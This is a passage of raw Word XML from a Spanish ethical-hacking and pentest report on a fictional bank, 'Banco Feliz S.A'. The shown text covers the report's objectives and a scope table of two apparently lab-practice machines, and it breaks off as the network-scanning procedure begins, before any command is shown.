                    <w:p w14:paraId="6132C282" w14:textId="77777777" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Avenir Light" w:hAnsi="Avenir Light"/>
                          <w:b/>
                          <w:color w:val="B4C6E7" w:themeColor="accent1" w:themeTint="66"/>
                          <w:sz w:val="32"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00BB6396">
                        <w:rPr>
                          <w:rFonts w:ascii="Avenir Light" w:hAnsi="Avenir Light"/>
                          <w:b/>
                          <w:color w:val="B4C6E7" w:themeColor="accent1" w:themeTint="66"/>
                          <w:sz w:val="32"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                        <w:t>Desarrollado por:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="735CDBA7" w14:textId="16394453" w:rsidR="008A4824" w:rsidRPr="00BB6396" w:rsidRDefault="005D4C37" w:rsidP="008A4824">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:color w:val="B4C6E7" w:themeColor="accent1" w:themeTint="66"/>
                          <w:sz w:val="32"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Avenir Light" w:hAnsi="Avenir Light"/>
                          <w:b/>
                          <w:color w:val="B4C6E7" w:themeColor="accent1" w:themeTint="66"/>
                          <w:sz w:val="32"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Ing. </w:t>
                      </w:r>
                      <w:r w:rsidR="008A4824" w:rsidRPr="00BB6396">
                        <w:rPr>
                          <w:rFonts w:ascii="Avenir Light" w:hAnsi="Avenir Light"/>
                          <w:b/>
                          <w:color w:val="B4C6E7" w:themeColor="accent1" w:themeTint="66"/>
                          <w:sz w:val="32"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                        <w:t>Angel Ramón Paz López</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FB5271">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13770678" wp14:editId="087E2CCA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1521940</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>51762</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4798060" cy="1946910"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5" name="Imagen 5" descr="Home - Devel Group | Cybersecurity Redefined | Cybersecur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Devel Group | Cybersecurity Redefined | Cybersecurity Serv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8060" cy="1946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33036" w14:textId="59906737" w:rsidR="009362FC" w:rsidRDefault="009362FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FC6EB94" w14:textId="40BA685E" w:rsidR="00FB5271" w:rsidRDefault="00FB5271">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A42B7D6" w14:textId="7C9376D6" w:rsidR="00FB5271" w:rsidRDefault="00FB5271">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4042F7BD" w14:textId="6426DB36" w:rsidR="00FB5271" w:rsidRDefault="00FB5271">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B48062" w14:textId="44ADFA4E" w:rsidR="00FB5271" w:rsidRDefault="00FB5271">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61685FD8" w14:textId="23E43051" w:rsidR="00FB5271" w:rsidRPr="00272D2D" w:rsidRDefault="00272D2D" w:rsidP="00272D2D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00272D2D">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>INFORME HACKING ETICO &amp; PENTESTING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041E6181" w14:textId="1C8F4FAE" w:rsidR="00272D2D" w:rsidRPr="00272D2D" w:rsidRDefault="00272D2D" w:rsidP="00272D2D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40F09A6E" w14:textId="4BEC793F" w:rsidR="00272D2D" w:rsidRPr="00272D2D" w:rsidRDefault="00272D2D" w:rsidP="00272D2D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00272D2D">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t xml:space="preserve">ASUNTO: Análisis de Vulnerabilidades </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F431A4" w14:textId="55024D27" w:rsidR="00272D2D" w:rsidRPr="00272D2D" w:rsidRDefault="00272D2D" w:rsidP="00272D2D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00272D2D">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>EMPRESA: Banco Feliz S.A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8CA342" w14:textId="0E31F402" w:rsidR="00FB5271" w:rsidRDefault="00272D2D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00272D2D">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>FECHA DE EMISION: 14-07-2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6AAF5E" w14:textId="70D67D4A" w:rsidR="00272D2D" w:rsidRDefault="00272D2D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F917F68" w14:textId="5DD1503A" w:rsidR="00272D2D" w:rsidRDefault="00272D2D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00272D2D">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>OBJETIVO</w:t>
      </w:r>
      <w:r w:rsidR="00E702BA">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786593DC" w14:textId="503CB9CD" w:rsidR="00272D2D" w:rsidRPr="00E702BA" w:rsidRDefault="00E702BA" w:rsidP="00E702BA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E702BA">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>Identificar las vulnerabilidades a las que puede estar expuesta la empresa “Banco Feliz S.A”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62688DB6" w14:textId="51FC424A" w:rsidR="00E702BA" w:rsidRDefault="00E702BA" w:rsidP="00E702BA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E702BA">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>Explotar las vulnerabilidades identificadas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D904380" w14:textId="77777777" w:rsidR="00E702BA" w:rsidRDefault="00E702BA" w:rsidP="00E702BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A9D460" w14:textId="7C8B0D75" w:rsidR="00E702BA" w:rsidRDefault="00E702BA" w:rsidP="00E702BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E702BA">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>ALCANCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F72DC6" w14:textId="24802E67" w:rsidR="00E702BA" w:rsidRPr="00E702BA" w:rsidRDefault="00E702BA" w:rsidP="00E702BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E702BA">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Se </w:t>
      </w:r>
      <w:r w:rsidR="00A33C30" w:rsidRPr="00E702BA">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>evaluar</w:t>
      </w:r>
      <w:r w:rsidR="00A33C30">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>án</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> dos maquinas </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula4-nfasis5"/>
        <w:tblW w:w="8856" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1535"/>
        <w:gridCol w:w="2506"/>
        <w:gridCol w:w="2475"/>
        <w:gridCol w:w="2340"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A33C30" w:rsidRPr="00E702BA" w14:paraId="2F004D53" w14:textId="77777777" w:rsidTr="00A33C30">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535" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DA3B1F6" w14:textId="18248170" w:rsidR="00A33C30" w:rsidRPr="00E702BA" w:rsidRDefault="004A3343" w:rsidP="00E702BA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E702BA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Ítem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2506" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BEF0A93" w14:textId="73F0A342" w:rsidR="00A33C30" w:rsidRPr="00E702BA" w:rsidRDefault="00A33C30" w:rsidP="00E702B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Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C758BEF" w14:textId="4A264E05" w:rsidR="00A33C30" w:rsidRPr="00E702BA" w:rsidRDefault="00A33C30" w:rsidP="00E702B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Mac Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54862444" w14:textId="02F91CE8" w:rsidR="00A33C30" w:rsidRPr="00E702BA" w:rsidRDefault="00A33C30" w:rsidP="00E702B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IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A33C30" w:rsidRPr="00E702BA" w14:paraId="1DB5B720" w14:textId="77777777" w:rsidTr="00A33C30">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535" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39A325EB" w14:textId="77777777" w:rsidR="00A33C30" w:rsidRPr="00E702BA" w:rsidRDefault="00A33C30" w:rsidP="00E702BA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E702BA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2506" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42F28E20" w14:textId="1CE35B5F" w:rsidR="00A33C30" w:rsidRPr="00E702BA" w:rsidRDefault="00A33C30" w:rsidP="00E702B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metasplotaible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E432EB9" w14:textId="68A0889B" w:rsidR="00A33C30" w:rsidRPr="00E702BA" w:rsidRDefault="00A33C30" w:rsidP="00E702B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4"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A33C30">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>08:00:27:d9:5b:e6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22646BE4" w14:textId="6A8537E8" w:rsidR="00A33C30" w:rsidRPr="00E702BA" w:rsidRDefault="00A33C30" w:rsidP="00E702B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192.168.2.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A33C30" w:rsidRPr="00E702BA" w14:paraId="7EDA22E5" w14:textId="77777777" w:rsidTr="00A33C30">
        <w:trPr>
          <w:trHeight w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C1461A8" w14:textId="3DD76A93" w:rsidR="00A33C30" w:rsidRPr="00E702BA" w:rsidRDefault="00A33C30" w:rsidP="00A33C30">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2506" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04F32FA5" w14:textId="4B865FC2" w:rsidR="00A33C30" w:rsidRPr="00E702BA" w:rsidRDefault="00A33C30" w:rsidP="00A33C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Owaspbw</w:t>
            </w:r>
            <w:r w:rsidR="004A3343">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0077769B" w14:textId="466601FF" w:rsidR="00A33C30" w:rsidRPr="00E702BA" w:rsidRDefault="00CC2E17" w:rsidP="00A33C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val="es-419" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC2E17">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>08:00:27:3f:eb:ec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="020DCB7D" w14:textId="1ED60F1E" w:rsidR="00A33C30" w:rsidRPr="00E702BA" w:rsidRDefault="00A33C30" w:rsidP="00A33C3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HAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>192.168.2.</w:t>
            </w:r>
            <w:r w:rsidR="00C8559C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62A96E3E" w14:textId="18678680" w:rsidR="00E702BA" w:rsidRDefault="00E702BA" w:rsidP="00E702BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0256CA79" w14:textId="77777777" w:rsidR="00CC2E17" w:rsidRPr="00CC2E17" w:rsidRDefault="00CC2E17" w:rsidP="00CC2E17">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2E17">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">PROCEDIMIENTO </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A23AF4" w14:textId="5AD330E5" w:rsidR="00CC2E17" w:rsidRPr="00CC2E17" w:rsidRDefault="00CC2E17" w:rsidP="00CC2E17">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2E17">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Las acciones que se ejecutaron en el servicio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>para el análisis de vulnerabilidades fueron</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2E17">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC88EC" w14:textId="7B04E5E8" w:rsidR="00CC2E17" w:rsidRPr="00CC2E17" w:rsidRDefault="00CC2E17" w:rsidP="00CC2E17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2E17">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">El escaneo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">de la red para la identificación de las dos computadoras con el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8559C">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
